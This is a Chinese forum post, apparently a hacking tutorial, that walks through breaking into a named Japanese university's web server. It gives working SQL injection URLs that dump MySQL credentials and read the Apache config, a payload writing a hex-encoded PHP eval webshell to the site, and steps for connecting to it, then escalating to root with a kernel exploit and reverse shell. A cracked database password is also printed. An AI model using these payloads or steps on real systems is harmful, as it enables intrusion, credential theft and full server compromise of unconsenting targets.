入侵日本同志社大学

admin

入侵日本同志社大学技术分析

: o6 r* h8 d+ u% c0 q8 Whttp://www.doshisha.ac.jp/chs/news/index.php?i=-1
然后联合查询，猜字段，查版本，查密码，读取文件…….就是各种查啊，语句是：

http://www.doshisha.ac.jp/chs/news/index.php?i=-1+union+select+1,@@datadir,3,load_file(‘/etc/httpd/conf/httpd.conf’),5,group_concat(DISTINCT+user,0x3a,password,0x3a,file_priv,0x3a,host),7,8+from+mysql.user
! b" h. D  @/ f; R: ~


4 m& m- U8 w3 Y2 I  F9 R//@@datadir为数据库文件路径

& i, Q8 ?! p( x$ o  K
& T8 H# ?# e9 K$ z- ?" A& \//load_file读取网站容器apache的配置文件


8 p3 D" w$ q( M$ T//group_concat读取MySQL管理员的名字、密码、是否允许读写文件和允许登录的远程计算机
复制代码
) K3 V2 y2 L, v2 `) e
虽然解得MySQL的root账户密码为mysql00，但是host为localhost，只允许本机登陆，所以用处不大。
: \6 F6 V9 N* t7 l& Z) w
而且Apache的配置文件显示，服务器拒绝非该大学的ip访问/admin/和phpMyAdmin，所以即使爆出管理员账户密码也没用。
(大家对以上各种查和语句不太懂的可以参考以下文章：http://bbs.blackbap.org/thread-2243-1-1.html)

前面load_file是因为发现了各文件夹权限限制的死，不允许外校ip登陆，所以就猜了一下apache的配置文件绝对路径为默认，后来发现还真的是默认的路径。
如果知道怎么猜apache配置文件的路径的请参考以下文章：http://bbs.blackbap.org/thread-2242-1-1.html
# f* y- Y2 s0 r) e6 \
既然已经知道了Apache的配置文件的内容，我们也就轻易知道了网站物理路径，路径为：/http/www/koho/
虽然/admin和phpMyAdmin的目录都限制了，但是想了想，我们只要有注入点就可以可以写入shell了，因为php的GPC为off，怎么判断为off我就不说了。
直接写一句话：
9 Y2 ]# Z( b% v4 @! n! Y7 d
http://www.doshisha.ac.jp/chs/news/index.php?i=-1+union+select+ 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E,0x3c3f2f2a,3,4,5,6,7,0x2a2f3f3e+into+outfile+’/http/www/koho/english/engnews_img/aa.php’#
  {& ?0 T$ X$ M2 u: a


//最后的#是为了闭合前面的语句
  b) ~4 o" I/ y% \$ x% f
  b7 {$ e5 ^$ \7 n+ @7 K
" k% s2 i. Z  j& a/ n/*其中的0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E

. [( n8 p9 {. ^( O
- y& y3 l/ V, T& h为一句话<?php @eval($_POST['cmd']);?>的HEX编码，不懂(HEX编码)的话Google一下就好*/
: x5 F. y+ R: j& C1 i
0 H, u" x; X/ Z
9 X% J; F. C7 m//如果直接select 一句话 into outfile ‘路径’会提示字段数不同，所以select 1,2,3,4…来执行注入语句


//后面的0x3c3f2f2a和0x2a2f3f3e分别为’<?php //’的和’?>’HEX因为select后面的3,4,5,6会被写入webshell中，可能会导致一句话执行错误
//所以最后aa.php的内容就是”<?php @eval($_POST['cmd']);?><?php //3,4,5,6,7 ?>”
复制代码

& u, [: z& B4 F  \* \9 mHEX其实就是十六进制编码，不知道这个编码的话，去搜一下好了，HEX编码转换在线本地各种工具各种有
通过上述注入语句，我们就得到了一句话木马:
( Q4 ^* c: x  f2 a/ U; t* q
" M/ f  a  G# ]5 O& m! u

0 x& ~, d& O2 @# k8 }+ H( N
( @2 m3 a) g5 T8 X2 R5 L4 r6 d
& u9 y- X$ j' n! U4 l! Zhttp://www.doshisha.ac.jp/english/engnews_img/aa.php
复制代码

7 Q  o# a; N: i) U用菜刀连接，密码是cmd，如图所示：
6 u2 {) N# @/ p. |/ x& K; x然后在命令提示行里看了一下，现在的权限是：
) e- A( \( I' N- _1 a& m& ]1 ^7 O
5 S3 t* [# k" e  S" E之后按照惯例我看了一下/tmp/文件夹，发现/TMP/权限居然被禁掉了，很少有服务器禁掉这个文件夹的。
好在赋权给这个文件夹不需要root，直接执行赋权语句：
. M7 r, D3 I& f5 R' n/ M
3 n9 @! {; M& q2 M7 L
" ]# {+ M4 ?9 V4 l5 U
4 j1 ~( n3 O. V& q8 O8 N
7 [% F! Z# Y9 n
1 F) o/ ?, }9 echmod +x /tmp/
9 y, `8 m8 e( j' @( U复制代码
: p) w# u/ S% h: h6 t" a' D, {
在这说一下，linux里面的文件夹跟文件一样，执行命令自然也可以按照像文件一样的执行
然后就查了一下内核版本：
( a" c% [2 N0 j8 J' c
5 k' _1 l/ P8 c; H
7 h  h1 j- {# D9 a


5 r, ]3 k8 c  V/ X2 e9 Z/ zuname-a
* P: ~6 E+ q: W2 h0 ?: p

! `. d* o) f6 \- P//其实lsb_release -a
复制代码

1 h: i" K: _. T: {' D5 D如图所示：

内核版本：linux mainz1 2.6.28-194.e15
1 e' x  y4 U5 g. s, G! g3 J, a/ w系统描述为：Red Hat Enterprise Linux Server release 5.5 (Tikanga)
3 n0 f" L) \0 h! J! |% t6 i查完了系统版本之后就去找找相应的提权脚本！~然后传到/tmp/文件夹

然后给予执行权限
- @" t3 U8 H* A+ t一般我都是传上去c源文件，然后”gcc -o /tmp/程序 /tmp/C源码”这样，如果gcc不能用，在其他机器编译好了直接传上去其实也可以，就像这样





chmod +x /tmp/2.6.18-194
复制代码 然后直接执行！~
' e! W9 T& Z1 w/ T# M6 O
; M. H, s. Q0 |% G总结：
0 r. ?  ~  x! `这个注入点的基本思路就是，发现MySQL账户为root，GPC设置为off，搞到了物理路径就直接写Webshell了
提权部分原理就是，本地监听端口，将对方机器反弹回cmdshell来，然后把和内核版本对应的EXP传上去，编译运行，得到root